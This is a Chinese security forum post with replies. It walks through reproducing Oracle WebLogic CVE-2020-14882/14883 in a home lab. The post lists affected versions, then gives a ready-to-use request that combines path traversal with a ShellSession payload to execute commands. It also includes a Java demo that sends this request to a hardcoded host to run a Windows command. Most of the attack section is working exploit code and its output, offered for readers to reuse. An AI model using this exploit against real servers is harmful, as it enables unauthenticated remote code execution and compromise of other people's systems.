用户
搜索

该用户从未签到

版主

Rank: 7Rank: 7Rank: 7

25

主题

166

帖子

1489

魔法币
收听
17
粉丝
7
注册时间
2017-7-21

突出贡献春秋达人积极活跃奖核心白帽i春秋签约作者

发表于 2020-11-10 17:50:19 54234
本帖最后由 可爱的小雨淅淅 于 2020-11-10 18:15 编辑

0x01 介绍

   10月21  Oracle官方发布了关于weblogic服务器的众多漏洞 其中就有两个漏洞在网上很容易找到poc是的  没错 就是cve-2020-14882 和 cve-2020-14883

   本来上个礼拜一就打算写这篇文章的  但是因为很多事情 忙不过来  才拖到现在了  






(小声逼逼:说起来也好久没来写文章了)

5C6564B2B2DC434FD355B976685DFC6F.gif



0x02 影响范围

                                                                                                                                                                                                                              
                             

                                 
  • 10.3.6.0.0
                                 
  • 12.1.3.0.0
                                 
  • 12.2.1.3.0
                                 
  • 12.2.1.4.0
                                 
  • 14.1.1.0.0
我这里用的weblogic 12.2.1.4


0x03 实验验证

  1.首先是环境搭建

     emmmm  这个环境搭建就不用说了吧  网上能搜到很多

           不过值得一提的是 weblogic的安装挺简单的 但是我还是踩坑了

           为了避免大伙踩坑  所以安装过程中  也可以参考一下这篇文章  https://www.jianshu.com/p/1fea981ed61f  

H68Z]VWLE[{]~]D{C8[%N3M.jpg

怪我咯  谁让我菜的都不配给大佬提鞋~



  2.实验开始

    首先 weblogic目录下(\user_projects\domains\base_domain\) 双击 开启weblogic

1.png


然后手动构造一下exp

http://ip:port/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)";
3.png


     好的  构造的exp 很轻松的验证了   那闲话不多说  直接上自己写的demo




[Java] 纯文本查看 复制代码
public class CVE_2020_14882 {
	
public static void main(String[] args) {
new CVE_2020_14882().getHttp("192.168.0.71:7001", null);
}

public void getHttp(String url,String cookies) {
java.net.URL u = null;
java.net.HttpURLConnection con = null;
try {
String urls = "http://"+url+"/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27cmd /k start dir%27);%22)";
u = new java.net.URL(urls);
con = (java.net.HttpURLConnection) u.openConnection();
StringBuffer buffer1 = new StringBuffer();
java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(con
.getInputStream(), "UTF-8"));
String temp;
while ((temp = br.readLine()) != null) {
buffer1.append(temp);
buffer1.append("\n");
}
			
}catch (Exception e) {
// TODO: handle exception
System.err.println(e.getMessage());
}
}		
}

4.png



因为猫本懒惰  所以 原理什么的都懒得写  介绍的也不详细   所以 各位师傅们别喷孩子哈~

因为demo有了  有兴趣的大佬们可以自己去写一个poc





   



发表于 2020-11-10 18:01:19
还带壁纸!666
使用道具 举报 回复

速度还挺快  
发布以后 排版都乱了   我都一脸懵逼~
使用道具 举报 回复
吐槽一下  这个神之编辑器  怎么蹦出那么多标签  还得一行一行的检查多余的标签删掉    ($MYP278PY754O)]}}U}5LK.png
使用道具 举报 回复
发表于 2020-11-10 18:17:37
这个排版乱了的我好头疼啊~ T]1)K@C9DJ%XSM4)NRY4YM7.png
使用道具 举报 回复
发表于 2020-11-17 19:00:45
雨佬牛批
让我们一起干大事!
有兴趣的表哥加村长QQ:780876774!
使用道具 举报 回复
发新帖
您需要登录后才可以回帖 登录 | 立即注册